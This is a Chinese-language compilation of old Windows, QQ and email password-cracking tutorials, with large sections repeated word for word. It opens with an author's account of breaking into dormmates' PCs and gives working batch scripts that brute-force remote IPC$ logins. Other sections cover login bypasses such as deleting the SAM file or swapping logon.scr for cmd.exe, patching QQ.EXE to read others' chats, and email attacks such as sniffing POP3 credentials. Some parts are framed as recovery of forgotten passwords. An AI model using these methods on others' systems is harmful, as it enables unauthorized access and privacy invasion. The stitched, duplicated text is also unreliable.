破解window系统登录密码

用dos命令破解远程NT用户密码

假如知道一个NT帐户与密码，就可以用 net use \\主机\ipc$ "密码" /user:"用户" 与远程主机建立连接，这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法，甚至连我这个连菜鸟都算不上的小鸟都知道，我也仅仅知道这一条，我就用我仅仅知道的这一条在宿舍网里进入别人的电脑，因为他们的电脑密码都为空，被他们发现了之后狠K了一顿，然后纷纷加上了密码，这下可没戏了，想去偷窥他们的密码他们又防范得紧，只得想其他办法，也许各位大虾们就会利用其他方法，诸如寻找系统之类得到管理权限，而我不行，因为我前面说过，我只会那一条，那又会有人说用软件暴力破解密码就可以了，也许不错，但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法，却在无意间看DOS帮助时发现了一些命令，当真是天无绝人之路：

1、字典：for /f %i in (字典文件) do net use \\主机\ipc$ "%i" /user:"用户"

2、数字：for /l %i in (start,step,end) do net use \\主机\ipc$ "%i" /user:"用户"

以上可参看DOS里面for帮助，还别说，真让我给连上几台机子，可问题也随之而来，连是连上了，我仍然不知道密码，下次要用还得重新全部试过。

正失望，无意间又发现了一个好方法：

将下面文件存为pass.bat:

@echo off

echo

------------------------------------------------------------------- >>c:\pass.txt

echo

------------------------------------------------------------------- >>c:\pass.txt

date /t >>c:\pass.txt

time /t >>c:\pass.txt

echo 破解结果： >>c:\pass.txt

if "%6"=="1" goto shit2

:shit1

start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit

:shit2

start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5

:quit

将下面文件存为test.bat:

net use \\%1\ipc$ %2 /user:"%3"

goto answer%ERRORLEVEL%

rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回2

:answer0

echo 远程主机："%1" >>c:\pass.txt

echo 用 户："%3" >>c:\pass.txt

echo 密 码：%2 >>c:\pass.txt

net use \\%1\ipc$ /delet

exit

:answer2

将pass.bat与test.bat存放于system32中，用法如下：

1、如果用字典破解：pass.bat 字典文件路径及名称 主机 用户名

2、如果用数字破解：pass.bat 起始数 步长 结束数 主机 用户名 1 密码破解出来之后，存放于c:\pass.txt文件里面。

另外，我做的这些只是在局域网内测试，如果远程测试，受网速限制，具体情况只能靠自己去摸索

密码挡不住

我们每个人在使用计算机时都会用到各种各样的的密码。这些密码虽然给我们带来了安全,但是如果忘记了也会带来很大的麻烦。笔者写这篇文章的目的就在于减轻密码为我们所带来的的"麻烦"。

一、 开机密码

开机密码，也就是CMOS密码，根据用户设置的不同，开机密码一般分为两种不同情况，一种就是Setup密码（采用此方式时，系统可直接启动，而仅仅只在进入BIOS设置时要求输入密码）；另一种就是System密码（采用此方式时，无论是直接启动还是进行BIOS设置都要求输入密码，没有密码将一事无成）。对于用户设置的这两种密码，我们的破解方法是有所区别的。

1.Setup密码

如果计算机能正常引导，只是不能进入BIOS设置（即设置了Setup密码），那么我们在遗忘密码之后只需在DOS状态下启动DEBUG，然后输入如下命令即可手工清除密码：

_ o 70 16

_ o 71 16

_ q

另外，不熟悉DEBUG的用户也可到

http://www.newhua.com/down/Cmospwd.zip下载一个专门破解CMOS密码的工具软件Cmospwd。然后在DOS启动该程序，它就会将用户的CMOS密码显示出来（Cmospwd支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS），使用非常方便。

2.System密码

若没有密码根本不能启动计算机（即设置了System密码），那我们就无法通过软件来解决密码遗忘的问题了。此时惟一的方法就是打开机箱，给CMOS放电，清除CMOS中的所有内容（当然也就包括密码），然后重新开机进行设置。另外，有些主板设置了CMOS密码清除跳线，将该跳线短接也可达到同样的目的（详情参见主板说明书）。

二、Windows操作系统密码

1.Windows启动密码

遗忘Windows的启动密码虽然不会影响系统的启动，但它会导致用户无法进入自己的个人设置，因此破解Windows的启动密码以找回“丢失”的“个性”也是很有必要的。为此，我们可删除Windows安装目录下的*.PWL密码文件（或者把*.pwl改名）及Profiles子目录下的所有个人信息文件，然后重新启动

Windows ，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击“确定”按钮，Windows 密码即被删除。另外，运行“regedit.exe”，打开注册表数据库

“HKEY_LOCAL_MACHINE”→“Network”→“Logon”分支下的

“UserProfiles”修改为“0”，然后重新启动Windows 也可达到同样的目的。

2.电源管理密码

Windows的电源管理功能也可以设置密码，设置此功能后，系统在从节能状态返回时就会要求输入密码，从而在一定程度上实现保护系统的目的。不过由于电源管理功能的密码与Windows的启动密码完全一样，因此我们只要破解了Windows的启动密码，其电源管理密码也就不攻自破了。

从上面的介绍中可以看出，Windows的密码保护功能并不完善，无论是开机密码还是屏幕保护、电源管理密码都非常脆弱，我们必须辅之以其他控制措施才能达到防止他人入侵的目的。

3.IE浏览器分级审查的密码

有是我们忘记了我们设置的 windows 的IE 浏览器分级审查的密码，可以运行“regedit.exe”，打开注册表数据库把

“HKEY_LOCAL_MACHINE”→“Software”→“Microsoft”→“Windows”→“C

urrentVersion”→“Policies”→“Ratings” 下的 "key" 删除。(用"优化大师"和"超级兔子"也行)

三.去除开机屏保密码

有些用户通过一些设置，让屏幕保护程序在开机的时候自动运行，同时设置了屏幕保护密码，一动鼠标或键盘，便会要求输入密码，使用户无法登录Windows。一旦忘记密码，挽救的方法有两种：

方法一 在系统启动的时候，按F8键弹出系统启动菜单，选择Safe Mode（安全模式）。进入Windows后，然后右击桌面空白处并从弹出的快捷菜单中执行“属性”命令，打开“显示属性”设置框，并单击“屏幕保护程序”选项卡（如图3），把“密码保护”前的对勾去掉。重新启动计算机。

方法二 如果能登录Windows，我们可以用上面的方法。如果只能进入DOS（用软盘启动也可以），也能解除其密码。因为在注册表里

HKEY_CURRENT_USER\ControlPan

el\desktop\分支下的ScreenSaveUsePassword这个键值控制是否使用屏幕保护密码，0为不设密码，1则为使用预设的密码。因此在DOS状态下，输入Regedit/e a.reg KEY_CURRENT_USER，其作用是把KEY_CURRENT_USER分支下的内容全部导出到a.reg文件中，然后用DOS编辑器edit.exe打开a.reg（方法是：edit a.reg），在HKEY_CURRENT_USER\ControlPanel\desktop下，把

ScreenSaveUsePassword后面的1改为0（如图4），存盘退出。接着运行regedit

a.reg，把修改的内容导入注册表。最后重新启动电脑。需要注意，regedit.exe在系统盘下的\windows\system文件夹下。

Windows登录密码解救二招

(一) 忘记了Windows登录密码怎么办？

互联网上有关的解决方法数不胜数，但是尝试后你会发现，许多方法根本不能奏效，有的甚至会导致系统彻底崩溃。经笔者在Windows 2000和Windows XP中反复研究测试，终于发现了一种非常简单的方法，且屡试不爽，具体操作方法如下。

首先下载sfcfiles.dll文件。然后用DOS启动盘启动电脑。

如果Windows系统所在分区的文件格式为NTFS，则DOS系统无法直接识别，咱们可用Windows PE光盘启动电脑。Windows PE是用一款叫做Pebuilder的免费软件制作成的XP光盘，该光盘能启动电脑于Windows XP状态下（与硬盘启动的XP略有区别的）。光盘文件大小只有100多MB，能读写FAT32/NTFS格式的分区，可以访问网络，并且还具有图形界面，很适合作为系统崩溃后的救急平台。有关该光盘的制作方法可参考网上的相关说明，过程甚为简单。

接下来进入system32文件夹（Windows XP与Windows 2000 的system32文件夹所在位置分别为\WINDOWS\system32和\WINNT\system32），将system32文件夹内的sfcfiles.dll文件更名为sfcfiles.lld，再将下载的sfcfiles.dll文件复制到system32中。

然后重新启动电脑，系统登录前会弹出一个窗口（图1），点击“Details”按钮，在出现的（图2）所示窗口中选择“Administrator”用户，最后点击“设置密码”按钮重设超级用户的密码。接下来便可用新的密码正常登录系统。

密码破解后，自然不希望以后每次开机都出现图1所示窗口，解决方法很简单：在图1处除去DreamPack前的勾，系统会提示是否“Uninstall DreamPack”，选择“OK”即可。

(二)找回Windows XP密码又一招

在win2000里丢失管理员密码后，删除SAM文件来清空密码确实是一个很好的方法。但如果是在XP里呢？网上很多人说不行。我试了一下，删除重新启动进入到登陆画面实时，系统提示：“安全帐户管理器初始化失败”，点“确定”后又重新启动。难道这种方法在XP里真的不行吗？按照下面的几步做了后在下结论吧。

用启动盘进入DOS，依次输入：del c:\windows\system32\config\sam

copy c:\windows\repair\sam c:\windows\system32\config

再重新启动后，就可以发现不用输入密码直接登陆了。此时，登陆用的帐户是administrator,桌面上只有很少的几个图标（原来的用户名就是这个的除外）。不过还好，安装过的软件都可以从“程序”中打开。如果原来的用户名不是administrator，那就还没达到我们的目的。在运行里输入“cmd”，然后在命令提示符下依次输入（比如原来的用户名是fyland）：

net user fyland /add

net localgroup administrators fyland /add （如果以前就是受限用户就不需要这步了）。

当然，这两步可以在控制面板中设置，具体方法就不用多说了。

重新启动后选择你原来的帐户登陆，再看看桌面以及设置的项目是不是和以前一样？最后一步就是你自己设置开机密码了。

这种方法最关键是repair文件下有一个备份过的SAM文件，如果你在优化系统时删除了，那我只能说：对不起，让你白看了这么多！

轻松破解 Windows登录密码

当你在使用电脑时，不小心将管理员登录密码忘记了，怎么办呢？虽然网上和各IT杂志介绍了很多种破解管理员登录密码的方法，但操作起来都比较麻烦，并且针对不同的系统须要用不同的破解方法。例如，用破解Winodws 2000的方法，来破解Windows XP和Windows 2003就不行了（会在启动系统时出现“安全账户初始化失败”的提示）。

在此笔者向大家推荐一款可在DOS下清除Windows 2000/XP/2003的用户密码的免费软件——Acti ve@PasswordChanger（下载地址：http://qkdown.com/Software/Catalog 90/358.html）。下面介绍该软件的使用方法。

1.软件下载解压后会出现一个仅为27KB的。exe执行文件。进入DOS环境运行dospass，在“Your choince：[ ]”中输入“1”（选择逻辑磁盘），按Enter键后，会出现显示你的电脑硬盘分区表窗口，此时你仍然继续按Enter键，会出现已检测到磁盘MS SAM Database文件窗口。再继续按Enter键，出现如图所示的窗口。

从图中我们可以看到，系统中的用户会全部显示出来，在“Your choince：[ ]”中输入“0”后按Enter键（如果你的系统管理员用户名称不是Administrator，而是其他名称的话，只要输入其名称前的序列号即可）。

2.在出现“Would you like to Rest this User‘s password？ （Y，N）[N] ： [ ]”提示后，你输入“Y”后按Enter键，稍等一会儿就出现“Password has been successfully reset. （Press any key„）”提示，说明密码破解成功。重新启动计算机即可直接登录系统了。

无密码登陆WinXP或者Win2000

忘记Windows系统中用户或者本地管理员的密码一个经常性的问题，如果你按照下面技巧重的方法去做，步需要记住Windows系统的密码。

1.输入“regedit”来打开注册表;

2.进入HKEY_USERS --> Default --> Control Panel --> Desktop

3.把“ScreenSaveTimeOut”设置成15，“SCRNSAVE.EXE”设置成"CMD.EXE;

如大家所知，Windows系统正常的登陆界面仅仅是一个屏保。如上设置改变登陆界面成为命令提示符，这个提示符在最初的登陆屏保的时候将会显示15秒钟，在经过以上设置后，在c:windowssystem32中将存在一个命令提示符，登陆界面也将出现。当你更新这些设置以后，你在系统将不需要登陆密码。

按照以下步骤进行操作，就可以修改任何用户的密码，甚至包括本地管理员的。

在命令提示符中输入“mmc lusrmgr.msc”这将打开用户管理平台，这样就可以为任何用户重置密码了。

用ERD轻松修改系统登录密码

在机房管理过程中，我们经常会碰到因一时疏忽而忘记了系统超级管理员密码的情况。由于事前没有制作密码重设盘，等发现遗忘密码无法登录时，便后悔莫及。计算机系统分区中没有什么重要资料还好说，花上几个小时把系统分区格式化后重新安装一遍即可；但如果系统分区内留有重要资料或者服务器系统配置较为复杂，用这种笨办法就不行了。

如何才能在不重装系统的情况下修改系统登录密码呢？只要您通过搜索引擎查一下，就可以找到许多方法。这些方法概括起来大致有以下几种：

1. 用系统内置的Administrator系统超级用户登录。在默认情况下，Administrator账号的密码是空的。因此，我们可在“带命令行的安全模式”下，以系统超级用户Administrator的身份进入系统，然后用“Net User”命令强制更改用户密码或新建用户账号。也可在出现经典登录界面要求输入用户名和密码时，输入Administrator账号，再用空密码进入系统(在Windows XP中如不出现经典登录界面，可按住Ctrl+Alt后连按两下Del键即可)。用这种方法登录系统后，我们就可以删除或新建用户

账号了。

然而，这种方法只能对付系统本来就没有给默认的Administrator账号设置密码的情况。要是原系统中已经给它设置了密码，则根本无法用这种方法登录系统，更不要说用“Net user”了。

2. 删除系统文件夹System32\Config下的SAM文件。这种方法只在Windows 2000中有效，要是用来对付Windows XP和Windows 2003，则会在启动系统时出现“安全账户初始化失败”的提示，使整个系统无法使用。

3. 在DOS状态下，将系统文件夹System32下的logon.scr改成其他名称，再将cmd.exe改成logon.scr后重新启动系统。等上10 分钟后，系统会将改了名的cmd.exe文件当作屏幕保护程序自动运行，这样便进入DOS界面。这时，我们就可用net user命令给系统添加用户或更改密码了。但实际上，在Windows XP SP1(SP2)和Windows 2003中，用这种方法进入后，不再像前几个版本一样具有系统超级用户Administrator权限。当用Net user添加用户时，系统会提示“发生系统错误。拒绝访问”，让你根本无法添加用户。

4. 用WindowsKey、DreamPackPL等软件更改系统登录密码。但这些软件不是找不到有效的注册码，就是界面不够友善，操作步骤也太复杂。对于一般用户而言，面对一串串英文往往会不知所措。

那么，有没有更好的方法来轻松修改系统登录密码呢？答案是肯定的。ERD Commander 2003就是一款可以轻松修改系统管理员密码的傻瓜化软件，而且这款软件对Windows 2000/XP/2003各种版本的系统均有效。

下面就具体介绍一下这款软件的用法。

1. 下载ERD Commander 2003。下载完成后先将 “WinPE+ERD2003.rar”文件的扩展名更改为“.Iso”，然后用刻录机将此ISO镜像刻录成CD。

2. 用此CD启动电脑，进入ERD Commander 2003启动界面。在启动过程中， ERD 2003可能会让用户针对系统硬件配置进行一些选择。由于我们的目的只是借它来修改密码，所以一路选“是”即可。

3. 接下来，ERD 2003会在你的硬盘里搜索所有已安装的系统，搜索完毕后让你选择要修改登录密码的系统所在目录，选择好后按[确定]便可进入ERD 2003桌面。

4. ERD 2003的界面与Windows XP类似。单击任务栏上的[开始]按钮，选择“管理工具→密码修改”命令，即弹出“ERD Commander 2003 Locksmith Wizard”欢迎页。点击“Next”，出现了修改系统登录密码的对话框。在对话框中先选择一个用户名，然后在下面的密码框中输入你要设置的密码。完成后再点击[Next]，系统提示“密码修改成功，请重新启动计算机测试新密码”。点击[Finish]之后按提示重启系统，这时用你修改的密码就可登录对应的账户了。

用这种方法修改忘记了的系统登录密码，是不是太简单了？只要有了ERD Commander 2003，你就有了一把登录Windows系统的万能钥匙。

破解Word与Excel的文档密码

经常和办公软件打交道的人肯定知道，如果把加密文档的密码忘了就相当于将这个文件报废了,那将会是一件多么可怕的事情。但人类是万能的，今天就为大家介绍一款软件，可以松破解Word和Excel密码，解您后顾之忧。这个工具就是Office Password Remover。

它可以在很短的时间内破解Word和Excel文档的密码，经过测试最多不超过5秒。使用本软件时需要连接到Internet，因为要给该软件的服务器发送数据并解密。不过大家可以放心，本软件不会泄露任何个人隐私。

使用方法：

首先运行解压好的OPRemove.exe 这个程序，打开程序后可以看到中间文本框后面有个类似文件夹的按钮。

点击它浏览打开要破解的文档。

选择后出现下图的画面，点击移除密码。

呆几秒钟后便出现“该文档已经被成功破解”，点确定即可，这时候就大功告成了。

在这里要注意的是，破解后的文章名字会有点变化，加了“DEMO”这四个字母，翻译过来就是示范的意思，不必在意，重命名去掉就可以了。

另外，为了防止别人用该软件，也可以给它设置密码，打开软件后，点文件 — 设置访问密码，输两遍就OK了。下次运行时就出现提示要求输入运行程序的密码。

软件名称：http://www.hackol.com/Software/Catalog62/1323.html 打造QQ密码破解器

现在使用QQ的网友越来越多了。可是如果密码忘记了或嫌输入QQ密码过于麻烦，那怎么办呢。我们可以自己制作一款QQ密码器。如果你感兴趣的话。可以和我一起自己动手做一个这样的QQ密码破解器。

首先，介绍一下我们要用到的工具软件——Keymake。Keymake是中文界面的国产软件，它是一款可以很方便的制作出自己的“注册机”或软件补丁的软件。之所以给“注册机”加上了引号，是因为严格说来，用Keymake来制作

的“注册机”并不是真正的注册机，只能算做是软件的补丁或另类注册机（用Keymake制作的“注册机”在运行后，可以让注册码自己跳出来，直接显示在屏幕上）。

QQ密码破解软件

目前有许多程序的注册码算法都与硬件有关，这类程序在每一台机上安装时都会生成一个机器码，要把这个机器码E-MAIL给作者，待他收到机器码后，再算出注册码寄回给用户，一机一码的结果就是软件只能一机一用。

本来这样无可厚非，但是有些时候，这样做给用户却造成了不少的麻烦，因为只要用户重装系统或升级更换硬件，就要重新去注册软件。对于这种程序，一般人只能在内存中找到自己机器的注册码，但这种注册码到了其它的机器上又不能用了，而自己又没有办法写出注册机来，为了解决这方面的问题，作者写了这个小软件，它可以从另一进程中取出注册码，并在屏幕中显示出来，并且不需要你去了解待注册程序的算法也不需要你会编程，是不是很方便呀？

今天我们就利用它的制作补丁功能制作出QQ聊天补丁，突破QQ的本地密码验证，使得我们无需输入密码就可以进入QQ，实现自由查看QQ聊天记录的目的！ 下面正式开始。首先，请你下载16进制文件编辑器UltraEdit汉化版，用它来修改QQ的主文件，改造出一个可以无需密码就能登陆的QQ，安装完毕之后，单击桌面上的UltraEdit图标运行它，然后点击“文件”菜单中的“打开”，找到QQ安装目录下的QQ.EXE，点击“确定”打开该文件。

然后点击“搜索”菜单下的“查找”，在出现的对话框的“查找什么”栏中填入：

F[1**********]37D1801，这些代码中的“0F8499000000”就是判定你输入的密码是否和真正的QQ密码是否相等的汇编代码的机器码。

把“QQ密码破解器”拿到朋友家去炫耀一番，运行它试试， 看，界面中有你的大名和使用说明。

点击“浏览”按钮找到待打补丁的QQ.EXE文件，单击“应用”按钮即可。然后再运行QQ试试，怎么样在登陆时无需输入密码了吧？对于任何号码都如此，哈哈，大功告成！保管你的朋友佩服得五体投地，一个劲地询问你是怎么做的。你还可以把该文件放到网上，让更多的人体验你的智慧和创意，快试试吧！

QQ密码破解工具

强力破解E-mail密码三种方法

电子邮件并不是安全的，在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节，恶意用户如果利用其漏洞，就能够轻易的破解出账号，获得邮件内容。

一、利用邮件服务器操作系统的漏洞

邮件服务器软件是运行在特定的操作系统上的，如Linux、

Windows NT/2000等。这些操作系统的默认安装和配置都是不安全的，黑客可以轻易入侵系统，获得所有用户名和密码。

1 Windows服务器

如果是基于Windows2000的Exchange Mail Server，系统本身未做任何安全配置，开放了若干服务。入侵者可以利用终端服务器结合中文输入法漏洞或者IIS的Buffer Overflow程序获得Administrator权限，用pwduMP3导出Hash过的密码，再用L0pht挂接字典或者Brute Force就能破解出用户密码。根据经验，如果密码简单，几分钟之内就能破解出，长度在8位及以下的用Brute Force方式在一天内就能解出。

2 Linux/UNIX服务器

UNIX类系统一般采用Sendmail作为邮件系统，在获得了系统的控制权之后，用John等软件就能从/etc/passwd或者/etc/shadow中破解出密码。如果采用了数据库方式来保存用户信息和密码，也是很容易被导出。

二、利用邮件服务器软件本身的漏洞

最常见的邮件服务器程序有Sendmail，Qmail等，在不同程度在都存在安全缺陷。以Sendmail为例，再以前的老版本中，telnet到25端口，输入wiz，然后接着输入shell，就能获得一个rootshell，还有debug命令，也能获得root权限。Qmail相对Sendmail安全，但是Qpoper存在Buffer Overflow缺陷，能够远程得到rootshell，进而控制系统。

即使邮件服务器是安全的，但是入侵者还能获得更多的信息，比如用户名。telnet到25端口，输入expn tom或者vrfy tom就能查询系统是否有tom用户。最新版本的Sendmail虽然禁用了这两个命令，但是可以通过伪造发信人然后用rcpt to来判断该用户是否存在。

得到了用户名，可以telnet到110端口，尝试简单密码的连接，或者套用字典破解。

所以，必须禁止非本域的中继利用(relay)，或者采用现在很多ISP都采用的给SMTP加上发信认证的模块，这样能够增强邮件服务器的安全。 除了POP3方式收信之外，比较流行的是在WEB界面上处理邮件。这种方式也不无弱点，一般是通过CGI来接受用户传递的表单form参数，包括username和password，如果正确，就可以进入处理邮件的页面。破解已知用户的密码，有很多套用字典或者暴力组合的软件可用，比较著名的是小榕的《溯雪》，在密码简单的情况下，很快就有结果。

WEB邮件系统都有“忘记密码”的选项，如果能破解寄回密码的另外一个邮箱或者猜出提示问题的答案，也能成功。

三、在邮件的传输过程中窃听

在网络中安装Sniffer，指定监听往外部服务器110端口发送的数据包，从收集下来的信息中查看user和pass后的字符串就能看到用户名和相应的

密码。

用屏保替换法清除WIN2000/WINXP登陆密码

就是把%systemroot%\system32\logon.scr替换为cmd.exe或者explorer.exe，然后在系统登陆处等待，过一会，系统就会去运行logon.scr这个屏保，因为你替换了这个屏保文件，所以实际上运行的是cmd.exe或者explorer.exe，并且是localsystem权限，于是你可以随便了，最简单的就是在cmd.exe里运行netuseradministrator""，成功后管理员密码也被清空了，关闭cmd或者explorer就可以用空口令登陆了。

用dos命令破解远程NT用户密码

假如知道一个NT帐户与密码，就可以用 net use \\主机\ipc$ "密码" /user:"用户" 与远程主机建立连接，这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法，甚至连我这个连菜鸟都算不上的小鸟都知道，我也仅仅知道这一条，我就用我仅仅知道的这一条在宿舍网里进入别人的电脑，因为他们的电脑密码都为空，被他们发现了之后狠K了一顿，然后纷纷加上了密码，这下可没戏了，想去偷窥他们的密码他们又防范得紧，只得想其他办法，也许各位大虾们就会利用其他方法，诸如寻找系统之类得到管理权限，而我不行，因为我前面说过，我只会那一条，那又会有人说用软件暴力破解密码就可以了，也许不错，但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法，却在无意间看DOS帮助时发现了一些命令，当真是天无绝人之路：

1、字典：for /f %i in (字典文件) do net use \\主机\ipc$ "%i" /user:"用户"

2、数字：for /l %i in (start,step,end) do net use \\主机\ipc$ "%i" /user:"用户"

以上可参看DOS里面for帮助，还别说，真让我给连上几台机子，可问题也随之而来，连是连上了，我仍然不知道密码，下次要用还得重新全部试过。

正失望，无意间又发现了一个好方法：

将下面文件存为pass.bat:

@echo off

echo

------------------------------------------------------------------- >>c:\pass.txt

echo

------------------------------------------------------------------- >>c:\pass.txt

date /t >>c:\pass.txt

time /t >>c:\pass.txt

echo 破解结果： >>c:\pass.txt

if "%6"=="1" goto shit2

:shit1

start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3 goto quit

:shit2

start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5

:quit

将下面文件存为test.bat:

net use \\%1\ipc$ %2 /user:"%3"

goto answer%ERRORLEVEL%

rem %ERRORLEVEL%表示取前一命令执行返回结果，net use成功返回0，失败返回2

:answer0

echo 远程主机："%1" >>c:\pass.txt

echo 用 户："%3" >>c:\pass.txt

echo 密 码：%2 >>c:\pass.txt

net use \\%1\ipc$ /delet

exit

:answer2

将pass.bat与test.bat存放于system32中，用法如下：

1、如果用字典破解：pass.bat 字典文件路径及名称 主机 用户名

2、如果用数字破解：pass.bat 起始数 步长 结束数 主机 用户名 1 密码破解出来之后，存放于c:\pass.txt文件里面。

另外，我做的这些只是在局域网内测试，如果远程测试，受网速限制，具体情况只能靠自己去摸索

密码挡不住

我们每个人在使用计算机时都会用到各种各样的的密码。这些密码虽然给我们带来了安全,但是如果忘记了也会带来很大的麻烦。笔者写这篇文章的目的就在于减轻密码为我们所带来的的"麻烦"。

一、 开机密码

开机密码，也就是CMOS密码，根据用户设置的不同，开机密码一般分为两种不同情况，一种就是Setup密码（采用此方式时，系统可直接启动，而仅仅只在进入BIOS设置时要求输入密码）；另一种就是System密码（采用此方式时，无论是直接启动还是进行BIOS设置都要求输入密码，没有密码将一事无成）。对于用户设置的这两种密码，我们的破解方法是有所区别的。

1.Setup密码

如果计算机能正常引导，只是不能进入BIOS设置（即设置了Setup密码），那么我们在遗忘密码之后只需在DOS状态下启动DEBUG，然后输入如下命令即可手工清除密码：

_ o 70 16

_ o 71 16

_ q

另外，不熟悉DEBUG的用户也可到

http://www.newhua.com/down/Cmospwd.zip下载一个专门破解CMOS密码的工具软件Cmospwd。然后在DOS启动该程序，它就会将用户的CMOS密码显示出来（Cmospwd支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS），使用非常方便。

2.System密码

若没有密码根本不能启动计算机（即设置了System密码），那我们就无法通过软件来解决密码遗忘的问题了。此时惟一的方法就是打开机箱，给CMOS放电，清除CMOS中的所有内容（当然也就包括密码），然后重新开机进行设置。另外，有些主板设置了CMOS密码清除跳线，将该跳线短接也可达到同样的目的（详情参见主板说明书）。

二、Windows操作系统密码

1.Windows启动密码

遗忘Windows的启动密码虽然不会影响系统的启动，但它会导致用户无法进入自己的个人设置，因此破解Windows的启动密码以找回“丢失”的“个性”也是很有必要的。为此，我们可删除Windows安装目录下的*.PWL密码文件（或者把*.pwl改名）及Profiles子目录下的所有个人信息文件，然后重新启动

Windows ，系统就会弹出一个不包含任何用户名的密码设置框，我们无需输入任何内容，直接点击“确定”按钮，Windows 密码即被删除。另外，运行“regedit.exe”，打开注册表数据库

“HKEY_LOCAL_MACHINE”→“Network”→“Logon”分支下的

“UserProfiles”修改为“0”，然后重新启动Windows 也可达到同样的目的。

2.电源管理密码

Windows的电源管理功能也可以设置密码，设置此功能后，系统在从节能状态返回时就会要求输入密码，从而在一定程度上实现保护系统的目的。不过由于电源管理功能的密码与Windows的启动密码完全一样，因此我们只要破解了Windows的启动密码，其电源管理密码也就不攻自破了。

从上面的介绍中可以看出，Windows的密码保护功能并不完善，无论是开机密码还是屏幕保护、电源管理密码都非常脆弱，我们必须辅之以其他控制措施才能达到防止他人入侵的目的。

3.IE浏览器分级审查的密码

有是我们忘记了我们设置的 windows 的IE 浏览器分级审查的密码，可以运行“regedit.exe”，打开注册表数据库把

“HKEY_LOCAL_MACHINE”→“Software”→“Microsoft”→“Windows”→“C

urrentVersion”→“Policies”→“Ratings” 下的 "key" 删除。(用"优化大师"和"超级兔子"也行)

三.去除开机屏保密码

有些用户通过一些设置，让屏幕保护程序在开机的时候自动运行，同时设置了屏幕保护密码，一动鼠标或键盘，便会要求输入密码，使用户无法登录Windows。一旦忘记密码，挽救的方法有两种：

方法一 在系统启动的时候，按F8键弹出系统启动菜单，选择Safe Mode（安全模式）。进入Windows后，然后右击桌面空白处并从弹出的快捷菜单中执行“属性”命令，打开“显示属性”设置框，并单击“屏幕保护程序”选项卡（如图3），把“密码保护”前的对勾去掉。重新启动计算机。

方法二 如果能登录Windows，我们可以用上面的方法。如果只能进入DOS（用软盘启动也可以），也能解除其密码。因为在注册表里

HKEY_CURRENT_USER\ControlPan

el\desktop\分支下的ScreenSaveUsePassword这个键值控制是否使用屏幕保护密码，0为不设密码，1则为使用预设的密码。因此在DOS状态下，输入Regedit/e a.reg KEY_CURRENT_USER，其作用是把KEY_CURRENT_USER分支下的内容全部导出到a.reg文件中，然后用DOS编辑器edit.exe打开a.reg（方法是：edit a.reg），在HKEY_CURRENT_USER\ControlPanel\desktop下，把

ScreenSaveUsePassword后面的1改为0（如图4），存盘退出。接着运行regedit

a.reg，把修改的内容导入注册表。最后重新启动电脑。需要注意，regedit.exe在系统盘下的\windows\system文件夹下。

Windows登录密码解救二招

(一) 忘记了Windows登录密码怎么办？

互联网上有关的解决方法数不胜数，但是尝试后你会发现，许多方法根本不能奏效，有的甚至会导致系统彻底崩溃。经笔者在Windows 2000和Windows XP中反复研究测试，终于发现了一种非常简单的方法，且屡试不爽，具体操作方法如下。

首先下载sfcfiles.dll文件。然后用DOS启动盘启动电脑。

如果Windows系统所在分区的文件格式为NTFS，则DOS系统无法直接识别，咱们可用Windows PE光盘启动电脑。Windows PE是用一款叫做Pebuilder的免费软件制作成的XP光盘，该光盘能启动电脑于Windows XP状态下（与硬盘启动的XP略有区别的）。光盘文件大小只有100多MB，能读写FAT32/NTFS格式的分区，可以访问网络，并且还具有图形界面，很适合作为系统崩溃后的救急平台。有关该光盘的制作方法可参考网上的相关说明，过程甚为简单。

接下来进入system32文件夹（Windows XP与Windows 2000 的system32文件夹所在位置分别为\WINDOWS\system32和\WINNT\system32），将system32文件夹内的sfcfiles.dll文件更名为sfcfiles.lld，再将下载的sfcfiles.dll文件复制到system32中。

然后重新启动电脑，系统登录前会弹出一个窗口（图1），点击“Details”按钮，在出现的（图2）所示窗口中选择“Administrator”用户，最后点击“设置密码”按钮重设超级用户的密码。接下来便可用新的密码正常登录系统。

密码破解后，自然不希望以后每次开机都出现图1所示窗口，解决方法很简单：在图1处除去DreamPack前的勾，系统会提示是否“Uninstall DreamPack”，选择“OK”即可。

(二)找回Windows XP密码又一招

在win2000里丢失管理员密码后，删除SAM文件来清空密码确实是一个很好的方法。但如果是在XP里呢？网上很多人说不行。我试了一下，删除重新启动进入到登陆画面实时，系统提示：“安全帐户管理器初始化失败”，点“确定”后又重新启动。难道这种方法在XP里真的不行吗？按照下面的几步做了后在下结论吧。

用启动盘进入DOS，依次输入：del c:\windows\system32\config\sam

copy c:\windows\repair\sam c:\windows\system32\config

再重新启动后，就可以发现不用输入密码直接登陆了。此时，登陆用的帐户是administrator,桌面上只有很少的几个图标（原来的用户名就是这个的除外）。不过还好，安装过的软件都可以从“程序”中打开。如果原来的用户名不是administrator，那就还没达到我们的目的。在运行里输入“cmd”，然后在命令提示符下依次输入（比如原来的用户名是fyland）：

net user fyland /add

net localgroup administrators fyland /add （如果以前就是受限用户就不需要这步了）。

当然，这两步可以在控制面板中设置，具体方法就不用多说了。

重新启动后选择你原来的帐户登陆，再看看桌面以及设置的项目是不是和以前一样？最后一步就是你自己设置开机密码了。

这种方法最关键是repair文件下有一个备份过的SAM文件，如果你在优化系统时删除了，那我只能说：对不起，让你白看了这么多！

轻松破解 Windows登录密码

当你在使用电脑时，不小心将管理员登录密码忘记了，怎么办呢？虽然网上和各IT杂志介绍了很多种破解管理员登录密码的方法，但操作起来都比较麻烦，并且针对不同的系统须要用不同的破解方法。例如，用破解Winodws 2000的方法，来破解Windows XP和Windows 2003就不行了（会在启动系统时出现“安全账户初始化失败”的提示）。

